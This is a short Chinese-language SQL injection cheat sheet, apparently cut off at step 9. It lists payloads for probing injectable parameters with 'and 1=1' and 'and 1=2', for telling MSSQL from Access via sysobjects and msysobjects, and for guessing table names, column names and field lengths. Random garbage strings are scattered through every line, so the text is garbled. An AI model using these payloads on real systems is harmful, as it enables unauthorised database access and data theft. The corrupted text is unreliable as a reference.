1.判断是否有注入;and 1=1 ;and 1=2 9&t!U+
2.初步判断是否是mssql ;and user>0 <fLk\
=
D@yuldx'/
3.注入参数是字符'and [查询条件] and ''=' 8*V8B=q}K
^-'t`mRl]d
4.搜索时没过滤参数的'and [查询条件] and '%25'=' ->S6S_H/+&
EjYCOb-
5.判断数据库系统 9+sOSz~
P
k-M-=VvA
;and (select count(*) from sysobjects)>0 mssql LpJ_HU7@lk
$*u{i4b
;and (select count(*) from msysobjects)>0 access <Gr775"
}nW) +
P!JRIw
}ST0?_0F*
6.猜数据库 ;and (select Count(*) from [数据库名])>0 `*1059
^9Je8 @Yu
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 "[LSDE"(
cKj6tT"=O
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 [Bz'c1
uPtHCP6
9.(1)猜字段的ascii值(access) UkY
`&&ic